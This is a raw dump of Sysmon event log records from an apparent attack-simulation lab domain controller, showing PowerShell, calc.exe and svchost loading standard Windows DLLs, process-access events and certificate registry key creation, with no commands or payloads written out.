SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 18141800x800000000000000057348169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:50.485{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x800000000000000057348168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:50.485{8B6011A9-C6FA-616E-9B35-01000000F101}300<Anonymous Pipe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x800000000000000057349068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\AppXDeploymentClient.dll10.0.14393.4169 (rs1_release.210107-1130)AppX Deployment Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationAppXDeploymentClient.dllMD5=34A42B1D3715F325F311010834280A12,SHA256=B94944CD1B3F960AA610E7A758032BDE743260391471A6EB35894DAA57D76ADEtrueMicrosoft WindowsValid 734700x800000000000000057349067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 11241100x800000000000000057349066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057349065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2607BB6051C2EBFE6850C6B869CAE0BD,SHA256=D312BDD7B06FF1D4ADD4F461DD5A08DF0CB6E27CB05828B57B24ABFDFDDE4479falsetrue 10341000x800000000000000057349064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-886B-6164-0A00-00000000F101}6408576C:\Windows\system32\services.exe{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 10341000x800000000000000057349062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057349060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057349059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057349058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057349057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057349056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057349055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057349054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057349053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057349052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057349051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057349050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057349049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057349048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 12241200x800000000000000057349047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 12241200x800000000000000057349040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 12241200x800000000000000057349036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 12241200x800000000000000057349025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.973{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057349020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057349019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057349018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057349017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057349016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057349015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.957{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7trueMicrosoft Windows PublisherValid 734700x800000000000000057349014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 734700x800000000000000057349013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057349012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057349011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057349010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057349009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.973{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057349008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 